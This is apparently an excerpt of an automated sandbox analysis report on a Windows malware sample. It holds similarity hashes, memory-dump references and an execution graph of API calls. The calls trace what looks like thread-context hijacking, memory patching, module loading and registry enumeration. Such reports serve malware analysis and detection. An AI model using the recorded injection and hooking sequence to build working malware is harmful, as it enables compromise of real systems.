                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: Message$ByteCharMultiWide
                                                                    • String ID: Fatal error detected
                                                                    • API String ID: 1878133881-4025702859
                                                                    • Opcode ID: 851903317bfc7efaf1ad6cdea84b2df33a0253a3527f03e892242bbcad957f63
                                                                    • Instruction ID: 7304f998045794fb31537991a1b39241d214b086ff850f1afaa3735d1ca1f409
                                                                    • Opcode Fuzzy Hash: 851903317bfc7efaf1ad6cdea84b2df33a0253a3527f03e892242bbcad957f63
                                                                    • Instruction Fuzzy Hash: A8214673638A8191E720DF10E4516DA6764FF847C8F806635D68D87969EF3CF205C750
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: Message$ByteCharMultiWide
                                                                    • String ID: Error detected
                                                                    • API String ID: 1878133881-3513342764
                                                                    • Opcode ID: 6f9a1586ca547a3c2f77bf815536a5540435ab6ab19a441e761cc5e7daea12c4
                                                                    • Instruction ID: 22e1ef7a1000dcbc1c3e79df1b2d3b376794b3a75384d3a1fa6687a5c3494275
                                                                    • Opcode Fuzzy Hash: 6f9a1586ca547a3c2f77bf815536a5540435ab6ab19a441e761cc5e7daea12c4
                                                                    • Instruction Fuzzy Hash: AE21587363868591E720DF10F4916DA6754FF847C8F806636D68D87969EF3CE205C750
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFileHeaderRaise
                                                                    • String ID: csm
                                                                    • API String ID: 2573137834-1018135373
                                                                    • Opcode ID: 5da07f41cc1f2f0249302dc9aa2704e59a17d1d76e31cb25285a30e0af08f503
                                                                    • Instruction ID: 0479fa351775938b8c460b0ddc55f60a89ebef03ee137ca9292e8987a54b15e1
                                                                    • Opcode Fuzzy Hash: 5da07f41cc1f2f0249302dc9aa2704e59a17d1d76e31cb25285a30e0af08f503
                                                                    • Instruction Fuzzy Hash: F9112E33629B4192EB618F15E44026ABBE5FB88B88F585734EE8C47768EF3CE5518700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true
                                                                    • Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd
                                                                    Similarity
                                                                    • API ID: DriveType_invalid_parameter_noinfo
                                                                    • String ID: :
                                                                    • API String ID: 2595371189-336475711
                                                                    • Opcode ID: 0484c027a31e3174e61c97ce986110c8cc183ac5b324247cdaa72bb813f071bc
                                                                    • Instruction ID: bcc76d44def7eb2f80a37f679c7af4bf63caf58270fb0f776922b9cba40e22c2
                                                                    • Opcode Fuzzy Hash: 0484c027a31e3174e61c97ce986110c8cc183ac5b324247cdaa72bb813f071bc
                                                                    • Instruction Fuzzy Hash: 2B018F6393830286FB20EF64946127F6BA0FF48708F802A39D54DC6695FE3CF544CA14

                                                                    Execution Graph

                                                                    Execution Coverage:4.8%
                                                                    Dynamic/Decrypted Code Coverage:12.9%
                                                                    Signature Coverage:2.6%
                                                                    Total number of Nodes:1031
                                                                    Total number of Limit Nodes:55
                                                                    execution_graph 37843 1f91b322b2c 37845 1f91b322b9d 37843->37845 37844 1f91b322ee0 37845->37844 37846 1f91b322bc9 GetModuleHandleA 37845->37846 37847 1f91b322bdb GetProcAddress 37846->37847 37848 1f91b322bed 37846->37848 37847->37848 37848->37844 37849 1f91b322c14 StrCmpNIW 37848->37849 37849->37844 37850 1f91b322c39 37849->37850 37850->37844 37851 1f91b32199c 6 API calls 37850->37851 37852 1f91b322e05 lstrlenW 37850->37852 37853 1f91b322d4b lstrlenW 37850->37853 37854 1f91b323844 StrCmpNIW 37850->37854 37855 1f91b32152c StrCmpIW StrCmpW 37850->37855 37851->37850 37852->37850 37853->37850 37854->37850 37855->37850 37856 1f91b325cf0 37857 1f91b325cfd 37856->37857 37858 1f91b325d09 37857->37858 37866 1f91b325e1a 37857->37866 37859 1f91b325d8d 37858->37859 37860 1f91b325d3e 37858->37860 37861 1f91b325d66 SetThreadContext 37860->37861 37861->37859 37862 1f91b325efe 37864 1f91b325f1e 37862->37864 37878 1f91b3243e0 VirtualFree 37862->37878 37863 1f91b325e41 VirtualProtect FlushInstructionCache 37863->37866 37874 1f91b324df0 GetCurrentProcess 37864->37874 37866->37862 37866->37863 37868 1f91b325f23 37869 1f91b325f77 37868->37869 37870 1f91b325f37 ResumeThread 37868->37870 37879 1f91b327940 IsProcessorFeaturePresent RtlCaptureContext RtlVirtualUnwind capture_previous_context 37869->37879 37871 1f91b325f6b 37870->37871 37871->37868 37873 1f91b325fbf 37875 1f91b324e0c 37874->37875 37876 1f91b324e53 37875->37876 37877 1f91b324e22 VirtualProtect FlushInstructionCache 37875->37877 37876->37868 37877->37875 37878->37864 37879->37873 37880 1f91b32554d 37882 1f91b325554 37880->37882 37881 1f91b3255bb 37882->37881 37883 1f91b325637 VirtualProtect 37882->37883 37884 1f91b325663 GetLastError 37883->37884 37885 1f91b325671 37883->37885 37884->37885 37886 1f91b2f273c 37887 1f91b2f276a 37886->37887 37888 1f91b2f27c5 VirtualAlloc 37887->37888 37890 1f91b2f28d4 37887->37890 37888->37890 37891 1f91b2f27ec 37888->37891 37889 1f91b2f2858 LoadLibraryA 37889->37891 37891->37889 37891->37890 37892 1f91b32253c 37893 1f91b3225bb 37892->37893 37894 1f91b32261d GetFileType 37893->37894 37905 1f91b3227aa 37893->37905 37895 1f91b32262b StrCpyW 37894->37895 37896 1f91b322641 37894->37896 37897 1f91b322650 37895->37897 37908 1f91b321a40 GetFinalPathNameByHandleW 37896->37908 37900 1f91b32265a 37897->37900 37901 1f91b3226ff 37897->37901 37900->37905 37913 1f91b323844 37900->37913 37916 1f91b323044 StrCmpIW StrCpyW StrCatW PathCombineW 37900->37916 37917 1f91b321cac StrCmpIW StrCmpW 37900->37917 37902 1f91b323844 StrCmpNIW 37901->37902 37901->37905 37918 1f91b323044 StrCmpIW StrCpyW StrCatW PathCombineW 37901->37918 37919 1f91b321cac StrCmpIW StrCmpW 37901->37919 37902->37901 37909 1f91b321aa9 37908->37909 37910 1f91b321a6a StrCmpNIW 37908->37910 37909->37897 37910->37909 37911 1f91b321a84 lstrlenW 37910->37911 37911->37909 37912 1f91b321a96 StrCpyW 37911->37912 37912->37909 37914 1f91b323866 37913->37914 37915 1f91b323851 StrCmpNIW 37913->37915 37914->37900 37915->37914 37916->37900 37917->37900 37918->37901 37919->37901 37920 1f91b321abc 37925 1f91b321628 GetProcessHeap 37920->37925 37922 1f91b321ad2 Sleep SleepEx 37923 1f91b321acb 37922->37923 37923->37922 37924 1f91b321598 StrCmpIW StrCmpW 37923->37924 37924->37923 37926 1f91b321648 Concurrency::details::SchedulerProxy::DeleteThis 37925->37926 37970 1f91b321268 GetProcessHeap 37926->37970 37928 1f91b321650 37929 1f91b321268 2 API calls 37928->37929 37930 1f91b321661 37929->37930 37931 1f91b321268 2 API calls 37930->37931 37932 1f91b32166a 37931->37932 37933 1f91b321268 2 API calls 37932->37933 37934 1f91b321673 37933->37934 37935 1f91b32168e RegOpenKeyExW 37934->37935 37936 1f91b3216c0 RegOpenKeyExW 37935->37936 37937 1f91b3218a6 37935->37937 37938 1f91b3216e9 37936->37938 37939 1f91b3216ff RegOpenKeyExW 37936->37939 37937->37923 37981 1f91b3212bc 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 37938->37981 37941 1f91b32173a RegOpenKeyExW 37939->37941 37942 1f91b321723 37939->37942 37945 1f91b32175e 37941->37945 37946 1f91b321775 RegOpenKeyExW 37941->37946 37974 1f91b32104c RegQueryInfoKeyW 37942->37974 37943 1f91b3216f5 RegCloseKey 37943->37939 37982 1f91b3212bc 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 37945->37982 37949 1f91b321799 37946->37949 37950 1f91b3217b0 RegOpenKeyExW 37946->37950 37983 1f91b3212bc 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 37949->37983 37953 1f91b3217eb RegOpenKeyExW 37950->37953 37954 1f91b3217d4 37950->37954 37951 1f91b32176b RegCloseKey 37951->37946 37956 1f91b32180f 37953->37956 37957 1f91b321826 RegOpenKeyExW 37953->37957 37984 1f91b3212bc 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 37954->37984 37960 1f91b32104c 5 API calls 37956->37960 37961 1f91b32184a 37957->37961 37962 1f91b321861 RegOpenKeyExW 37957->37962 37958 1f91b3217a6 RegCloseKey 37958->37950 37959 1f91b3217e1 RegCloseKey 37959->37953 37963 1f91b32181c RegCloseKey 37960->37963 37964 1f91b32104c 5 API calls 37961->37964 37965 1f91b32189c RegCloseKey 37962->37965 37966 1f91b321885 37962->37966 37963->37957 37967 1f91b321857 RegCloseKey 37964->37967 37965->37937 37968 1f91b32104c 5 API calls 37966->37968 37967->37962 37969 1f91b321892 RegCloseKey 37968->37969 37969->37965 37985 1f91b336168 37970->37985 37972 1f91b321283 GetProcessHeap 37973 1f91b3212ae Concurrency::details::SchedulerProxy::DeleteThis 37972->37973 37973->37928 37975 1f91b3210bf 37974->37975 37976 1f91b3211b5 RegCloseKey 37974->37976 37975->37976 37977 1f91b3210cf RegEnumValueW 37975->37977 37976->37941 37978 1f91b321125 Concurrency::details::SchedulerProxy::DeleteThis 37977->37978 37978->37976 37978->37977 37979 1f91b32114e GetProcessHeap 37978->37979 37980 1f91b32116e GetProcessHeap HeapFree 37978->37980 37979->37978 37980->37978 37981->37943 37982->37951 37983->37958 37984->37959 37986 1f91b323ab9 37989 1f91b323a06 37986->37989 37987 1f91b323a70 37988 1f91b323a56 VirtualQuery 37988->37987 37988->37989 37989->37987 37989->37988 37990 1f91b323a8a VirtualAlloc 37989->37990 37990->37987 37991 1f91b323abb GetLastError 37990->37991 37991->37987 37991->37989 37992 7ff72726bf5c 38013 7ff72726c12c 37992->38013 37995 7ff72726c0a8 38128 7ff72726c44c 7 API calls 2 library calls 37995->38128 37996 7ff72726bf78 __scrt_acquire_startup_lock 37998 7ff72726c0b2 37996->37998 38003 7ff72726bf96 __scrt_release_startup_lock 37996->38003 38129 7ff72726c44c 7 API calls 2 library calls 37998->38129 38000 7ff72726bfbb 38001 7ff72726c0bd __FrameHandler3::FrameUnwindToEmptyState 38002 7ff72726c041 38019 7ff72726c594 38002->38019 38003->38000 38003->38002 38125 7ff727278e44 45 API calls 38003->38125 38005 7ff72726c046 38022 7ff727261000 38005->38022 38010 7ff72726c069 38010->38001 38127 7ff72726c2b0 7 API calls 38010->38127 38012 7ff72726c080 38012->38000 38014 7ff72726c134 38013->38014 38015 7ff72726c140 __scrt_dllmain_crt_thread_attach 38014->38015 38016 7ff72726bf70 38015->38016 38017 7ff72726c14d 38015->38017 38016->37995 38016->37996 38017->38016 38130 7ff72726cba8 7 API calls 2 library calls 38017->38130 38131 7ff7272897e0 38019->38131 38023 7ff727261009 38022->38023 38133 7ff727274794 38023->38133 38025 7ff72726352b 38140 7ff7272633e0 38025->38140 38031 7ff72726356c 38035 7ff727261bf0 49 API calls 38031->38035 38032 7ff727263736 38330 7ff727263f70 38032->38330 38053 7ff727263588 38035->38053 38037 7ff727263785 38353 7ff7272625f0 53 API calls _log10_special 38037->38353 38041 7ff727263778 38043 7ff72726377d 38041->38043 38044 7ff72726379f 38041->38044 38042 7ff72726365f __std_exception_destroy 38047 7ff727263834 38042->38047 38048 7ff727267e10 14 API calls 38042->38048 38349 7ff72726f36c 38043->38349 38046 7ff727261bf0 49 API calls 38044->38046 38050 7ff7272637be 38046->38050 38074 7ff727263805 __std_exception_destroy 38047->38074 38355 7ff727263e90 49 API calls 38047->38355 38051 7ff7272636ae 38048->38051 38060 7ff7272618f0 115 API calls 38050->38060 38215 7ff727267f80 38051->38215 38052 7ff727263852 38055 7ff727263865 38052->38055 38056 7ff727263871 38052->38056 38202 7ff727267e10 38053->38202 38356 7ff727263fe0 49 API calls 38055->38356 38059 7ff727261bf0 49 API calls 38056->38059 38057 7ff7272636bd 38062 7ff72726380f 38057->38062 38064 7ff7272636cf 38057->38064 38059->38074 38061 7ff7272637df 38060->38061 38061->38053 38063 7ff7272637ef 38061->38063 38224 7ff727268400 38062->38224 38354 7ff7272625f0 53 API calls _log10_special 38063->38354 38220 7ff727261bf0 38064->38220 38070 7ff72726389e SetDllDirectoryW 38076 7ff7272638c3 38070->38076 38073 7ff7272636fc 38320 7ff7272625f0 53 API calls _log10_special 38073->38320 38275 7ff7272686b0 38074->38275 38077 7ff727263a50 38076->38077 38280 7ff727266560 38076->38280 38081 7ff727263a7d 38077->38081 38082 7ff727263a5a PostMessageW GetMessageW 38077->38082 38368 7ff727263080 168 API calls 38081->38368 38082->38081 38084 7ff7272638ea 38086 7ff727263947 38084->38086 38088 7ff727263901 38084->38088 38357 7ff7272665a0 121 API calls _log10_special 38084->38357 38086->38077 38093 7ff72726395c 38086->38093 38087 7ff727263a8d 38369 7ff7272633a0 FreeLibrary 38087->38369 38100 7ff727263905 38088->38100 38358 7ff727266970 91 API calls 38088->38358 38092 7ff727263a97 38095 7ff727266780 FreeLibrary 38092->38095 38300 7ff7272630e0 38093->38300 38094 7ff727263916 38094->38100 38359 7ff727266cd0 54 API calls 38094->38359 38097 7ff727263aa3 38095->38097 38100->38086 38360 7ff727262870 53 API calls _log10_special 38100->38360 38102 7ff72726393f 38361 7ff727266780 38102->38361 38105 7ff727263978 38106 7ff7272639a5 38105->38106 38107 7ff727263982 PostMessageW GetMessageW 38105->38107 38108 7ff727267f20 40 API calls 38106->38108 38107->38106 38109 7ff7272639b8 38108->38109 38110 7ff727267fc0 59 API calls 38109->38110 38111 7ff7272639c0 38110->38111 38112 7ff727266780 FreeLibrary 38111->38112 38113 7ff7272639ce 38112->38113 38114 7ff727267ec0 56 API calls 38113->38114 38115 7ff7272639e6 38114->38115 38116 7ff727263538 38115->38116 38117 7ff7272681f0 59 API calls 38115->38117 38321 7ff72726b870 38116->38321 38118 7ff7272639f2 38117->38118 38119 7ff727267ec0 56 API calls 38118->38119 38120 7ff7272639fe 38119->38120 38120->38116 38121 7ff727263a12 38120->38121 38122 7ff727263a31 38120->38122 38123 7ff7272625f0 53 API calls 38121->38123 38124 7ff727262870 53 API calls 38122->38124 38123->38116 38124->38116 38125->38002 38126 7ff72726c5d8 GetModuleHandleW 38126->38010 38127->38012 38128->37998 38129->38001 38130->38016 38132 7ff72726c5ab GetStartupInfoW 38131->38132 38132->38005 38136 7ff72727e790 38133->38136 38134 7ff72727e7e3 38370 7ff727279b24 38134->38370 38136->38134 38137 7ff72727e836 38136->38137 38380 7ff72727e668 71 API calls _fread_nolock 38137->38380 38139 7ff72727e80c 38139->38025 38388 7ff72726bb70 38140->38388 38143 7ff72726341b 38395 7ff7272629e0 51 API calls _log10_special 38143->38395 38144 7ff727263438 38390 7ff7272685a0 FindFirstFileExW 38144->38390 38147 7ff72726342e 38152 7ff72726b870 _log10_special 8 API calls 38147->38152 38149 7ff72726344b 38396 7ff727268620 CreateFileW GetFinalPathNameByHandleW CloseHandle 38149->38396 38150 7ff7272634a5 38398 7ff727268760 WideCharToMultiByte WideCharToMultiByte __std_exception_destroy 38150->38398 38155 7ff7272634dd 38152->38155 38154 7ff7272634b3 38154->38147 38399 7ff7272626c0 49 API calls _log10_special 38154->38399 38155->38116 38162 7ff7272618f0 38155->38162 38156 7ff727263458 38157 7ff72726345c 38156->38157 38158 7ff727263474 __vcrt_InitializeCriticalSectionEx 38156->38158 38397 7ff7272626c0 49 API calls _log10_special 38157->38397 38158->38150 38161 7ff72726346d 38161->38147 38163 7ff727263f70 108 API calls 38162->38163 38164 7ff727261925 38163->38164 38165 7ff727261bb6 38164->38165 38167 7ff7272676a0 83 API calls 38164->38167 38166 7ff72726b870 _log10_special 8 API calls 38165->38166 38168 7ff727261bd1 38166->38168 38169 7ff72726196b 38167->38169 38168->38031 38168->38032 38201 7ff72726199c 38169->38201 38400 7ff72726f9f4 38169->38400 38170 7ff72726f36c 74 API calls 38170->38165 38172 7ff727261985 38173 7ff727261989 38172->38173 38174 7ff7272619a1 38172->38174 38407 7ff727262760 53 API calls 2 library calls 38173->38407 38404 7ff72726f6bc 38174->38404 38178 7ff7272619d7 38181 7ff7272619ee 38178->38181 38182 7ff727261a06 38178->38182 38179 7ff7272619bf 38408 7ff727262760 53 API calls 2 library calls 38179->38408 38409 7ff727262760 53 API calls 2 library calls 38181->38409 38184 7ff727261bf0 49 API calls 38182->38184 38185 7ff727261a1d 38184->38185 38186 7ff727261bf0 49 API calls 38185->38186 38187 7ff727261a68 38186->38187 38188 7ff72726f9f4 73 API calls 38187->38188 38189 7ff727261a8c 38188->38189 38190 7ff727261ab9 38189->38190 38191 7ff727261aa1 38189->38191 38193 7ff72726f6bc _fread_nolock 53 API calls 38190->38193 38410 7ff727262760 53 API calls 2 library calls 38191->38410 38194 7ff727261ace 38193->38194 38195 7ff727261aec 38194->38195 38196 7ff727261ad4 38194->38196 38412 7ff72726f430 38195->38412 38411 7ff727262760 53 API calls 2 library calls 38196->38411 38201->38170 38203 7ff727267e1a 38202->38203 38204 7ff7272686b0 2 API calls 38203->38204 38205 7ff727267e39 GetEnvironmentVariableW 38204->38205 38206 7ff727267e56 ExpandEnvironmentStringsW 38205->38206 38207 7ff727267ea2 38205->38207 38206->38207 38209 7ff727267e78 38206->38209 38208 7ff72726b870 _log10_special 8 API calls 38207->38208 38210 7ff727267eb4 38208->38210 38487 7ff727268760 WideCharToMultiByte WideCharToMultiByte __std_exception_destroy 38209->38487 38210->38042 38212 7ff727267e8a 38213 7ff72726b870 _log10_special 8 API calls 38212->38213 38214 7ff727267e9a 38213->38214 38214->38042 38216 7ff7272686b0 2 API calls 38215->38216 38217 7ff727267f94 38216->38217 38488 7ff727277548 38217->38488 38219 7ff727267fa6 __std_exception_destroy 38219->38057 38221 7ff727261c15 38220->38221 38506 7ff727273ca4 38221->38506 38225 7ff727268415 38224->38225 38525 7ff727267b50 GetCurrentProcess OpenProcessToken 38225->38525 38228 7ff727267b50 7 API calls 38229 7ff727268441 38228->38229 38230 7ff72726845a 38229->38230 38231 7ff727268474 38229->38231 38535 7ff727262590 38230->38535 38233 7ff727262590 48 API calls 38231->38233 38235 7ff727268487 LocalFree LocalFree 38233->38235 38236 7ff7272684a3 38235->38236 38238 7ff7272684af 38235->38238 38539 7ff727262940 49 API calls _log10_special 38236->38539 38239 7ff72726b870 _log10_special 8 API calls 38238->38239 38240 7ff727263814 38239->38240 38241 7ff727267c40 38240->38241 38242 7ff727267c58 38241->38242 38243 7ff727267c7c 38242->38243 38244 7ff727267cda GetTempPathW 38242->38244 38246 7ff727267e10 14 API calls 38243->38246 38245 7ff727267cef 38244->38245 38559 7ff727262530 38245->38559 38247 7ff727267c88 38246->38247 38566 7ff7272677d0 67 API calls 2 library calls 38247->38566 38250 7ff727267c97 38251 7ff727267cc8 __std_exception_destroy 38250->38251 38253 7ff727277548 38 API calls 38250->38253 38274 7ff727267db4 __std_exception_destroy 38251->38274 38255 7ff727267cae __std_exception_destroy 38253->38255 38255->38244 38261 7ff727267cbc 38255->38261 38256 7ff727267d47 38568 7ff727268760 WideCharToMultiByte WideCharToMultiByte __std_exception_destroy 38256->38568 38257 7ff72726b870 _log10_special 8 API calls 38259 7ff727267df5 38257->38259 38259->38047 38260 7ff727267d08 __std_exception_destroy 38263 7ff727267d45 __std_exception_destroy 38260->38263 38563 7ff727277e80 38260->38563 38567 7ff7272626c0 49 API calls _log10_special 38261->38567 38262 7ff727267d59 38262->38263 38569 7ff7272626c0 49 API calls _log10_special 38262->38569 38266 7ff7272686b0 2 API calls 38263->38266 38263->38274 38267 7ff727267d91 38266->38267 38268 7ff727267dc9 38267->38268 38269 7ff727267d96 38267->38269 38270 7ff727277548 38 API calls 38268->38270 38271 7ff7272686b0 2 API calls 38269->38271 38270->38274 38272 7ff727267da6 38271->38272 38273 7ff727277548 38 API calls 38272->38273 38273->38274 38274->38257 38276 7ff7272686d2 MultiByteToWideChar 38275->38276 38277 7ff7272686f6 38275->38277 38276->38277 38279 7ff72726870c __std_exception_destroy 38276->38279 38278 7ff727268713 MultiByteToWideChar 38277->38278 38277->38279 38278->38279 38279->38070 38281 7ff727266575 38280->38281 38282 7ff7272638d5 38281->38282 38645 7ff727262760 53 API calls 2 library calls 38281->38645 38284 7ff727266b00 38282->38284 38285 7ff727266b30 38284->38285 38298 7ff727266b4a __std_exception_destroy 38284->38298 38285->38298 38646 7ff727261440 116 API calls 2 library calls 38285->38646 38287 7ff727266b54 38287->38298 38647 7ff727263fe0 49 API calls 38287->38647 38289 7ff727266b76 38290 7ff727266b7b 38289->38290 38648 7ff727263fe0 49 API calls 38289->38648 38651 7ff727262870 53 API calls _log10_special 38290->38651 38293 7ff727266b9a 38293->38290 38649 7ff727263fe0 49 API calls 38293->38649 38295 7ff727266bb6 38295->38290 38296 7ff727266bbf 38295->38296 38299 7ff727266c2f __std_exception_destroy memcpy_s 38296->38299 38650 7ff7272625f0 53 API calls _log10_special 38296->38650 38298->38084 38299->38084 38312 7ff7272630ee __scrt_get_show_window_mode 38300->38312 38301 7ff72726b870 _log10_special 8 API calls 38303 7ff72726338e 38301->38303 38302 7ff7272632e7 38302->38301 38303->38116 38319 7ff7272683e0 LocalFree 38303->38319 38305 7ff727261bf0 49 API calls 38305->38312 38306 7ff727263309 38714 7ff7272625f0 53 API calls _log10_special 38306->38714 38311 7ff7272632e9 38712 7ff7272625f0 53 API calls _log10_special 38311->38712 38312->38302 38312->38305 38312->38306 38312->38311 38317 7ff7272632f7 38312->38317 38652 7ff727263f10 38312->38652 38658 7ff727267530 38312->38658 38670 7ff7272615c0 38312->38670 38708 7ff7272668e0 45 API calls 38312->38708 38709 7ff727262870 53 API calls _log10_special 38312->38709 38710 7ff727263b40 119 API calls _log10_special 38312->38710 38711 7ff727263e00 49 API calls 38312->38711 38713 7ff7272625f0 53 API calls _log10_special 38317->38713 38320->38116 38322 7ff72726b879 38321->38322 38323 7ff72726372a 38322->38323 38324 7ff72726bc00 IsProcessorFeaturePresent 38322->38324 38323->38126 38325 7ff72726bc18 38324->38325 38763 7ff72726bdf8 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 38325->38763 38327 7ff72726bc2b 38764 7ff72726bbc0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38327->38764 38331 7ff727263f7c 38330->38331 38332 7ff7272686b0 2 API calls 38331->38332 38333 7ff727263fa4 38332->38333 38334 7ff7272686b0 2 API calls 38333->38334 38335 7ff727263fb7 38334->38335 38765 7ff7272752a4 38335->38765 38338 7ff72726b870 _log10_special 8 API calls 38339 7ff727263746 38338->38339 38339->38037 38340 7ff7272676a0 38339->38340 38341 7ff7272676c4 38340->38341 38342 7ff72726f9f4 73 API calls 38341->38342 38347 7ff72726779b __std_exception_destroy 38341->38347 38343 7ff7272676e0 38342->38343 38343->38347 38914 7ff727276bd8 38343->38914 38345 7ff72726f9f4 73 API calls 38348 7ff7272676f5 38345->38348 38346 7ff72726f6bc _fread_nolock 53 API calls 38346->38348 38347->38041 38348->38345 38348->38346 38348->38347 38350 7ff72726f39c 38349->38350 38929 7ff72726f148 38350->38929 38352 7ff72726f3b5 38352->38037 38353->38116 38354->38116 38355->38052 38356->38074 38357->38088 38358->38094 38359->38100 38360->38102 38362 7ff7272668d6 38361->38362 38367 7ff727266792 38361->38367 38362->38086 38363 7ff7272668aa 38365 7ff7272668c2 38363->38365 38941 7ff727268180 FreeLibrary 38363->38941 38365->38086 38367->38363 38940 7ff727268180 FreeLibrary 38367->38940 38368->38087 38369->38092 38381 7ff72727986c 18 API calls _invalid_parameter_noinfo 38370->38381 38372 7ff727279b4e 38374 7ff727279b5f 38372->38374 38382 7ff7272798d8 GetLastError SetLastError 38372->38382 38374->38139 38375 7ff727279bab 38375->38374 38383 7ff727279c10 IsProcessorFeaturePresent 38375->38383 38380->38139 38381->38372 38382->38375 38384 7ff727279c23 38383->38384 38387 7ff727279924 14 API calls 3 library calls 38384->38387 38386 7ff727279c3e GetCurrentProcess TerminateProcess 38387->38386 38389 7ff7272633ec GetModuleFileNameW 38388->38389 38389->38143 38389->38144 38391 7ff7272685f2 38390->38391 38392 7ff7272685df FindClose 38390->38392 38393 7ff72726b870 _log10_special 8 API calls 38391->38393 38392->38391 38394 7ff727263442 38393->38394 38394->38149 38394->38150 38395->38147 38396->38156 38397->38161 38398->38154 38399->38147 38401 7ff72726fa24 38400->38401 38419 7ff72726f784 38401->38419 38403 7ff72726fa3d 38403->38172 38431 7ff72726f6dc 38404->38431 38407->38201 38408->38201 38409->38201 38410->38201 38411->38201 38413 7ff72726f439 38412->38413 38415 7ff727261b06 38412->38415 38414 7ff7272743f4 _get_daylight 11 API calls 38413->38414 38416 7ff72726f43e 38414->38416 38415->38201 38418 7ff7272625f0 53 API calls _log10_special 38415->38418 38417 7ff727279bf0 _invalid_parameter_noinfo 37 API calls 38416->38417 38417->38415 38418->38201 38420 7ff72726f7ee 38419->38420 38421 7ff72726f7ae 38419->38421 38420->38421 38422 7ff72726f7fa 38420->38422 38423 7ff727279b24 _invalid_parameter_noinfo 37 API calls 38421->38423 38430 7ff72727477c EnterCriticalSection 38422->38430 38425 7ff72726f7d5 38423->38425 38425->38403 38426 7ff72726f7ff 38427 7ff72726f908 71 API calls 38426->38427 38428 7ff72726f811 38427->38428 38429 7ff727274788 _fread_nolock LeaveCriticalSection 38428->38429 38429->38425 38432 7ff7272619b9 38431->38432 38433 7ff72726f706 38431->38433 38432->38178 38432->38179 38433->38432 38434 7ff72726f715 __scrt_get_show_window_mode 38433->38434 38435 7ff72726f752 38433->38435 38445 7ff7272743f4 38434->38445 38444 7ff72727477c EnterCriticalSection 38435->38444 38438 7ff72726f75a 38440 7ff72726f45c _fread_nolock 51 API calls 38438->38440 38442 7ff72726f771 38440->38442 38443 7ff727274788 _fread_nolock LeaveCriticalSection 38442->38443 38443->38432 38451 7ff72727a5d8 GetLastError 38445->38451 38447 7ff72726f72a 38448 7ff727279bf0 38447->38448 38483 7ff727279a88 38448->38483 38450 7ff727279c09 38450->38432 38452 7ff72727a619 FlsSetValue 38451->38452 38454 7ff72727a5fc 38451->38454 38453 7ff72727a62b 38452->38453 38458 7ff72727a609 38452->38458 38468 7ff72727dea8 38453->38468 38454->38452 38454->38458 38455 7ff72727a685 SetLastError 38455->38447 38458->38455 38459 7ff72727a658 FlsSetValue 38462 7ff72727a676 38459->38462 38463 7ff72727a664 FlsSetValue 38459->38463 38460 7ff72727a648 FlsSetValue 38461 7ff72727a651 38460->38461 38475 7ff727279c58 38461->38475 38481 7ff72727a204 11 API calls _get_daylight 38462->38481 38463->38461 38466 7ff72727a67e 38467 7ff727279c58 __free_lconv_mon 5 API calls 38466->38467 38467->38455 38474 7ff72727deb9 _get_daylight 38468->38474 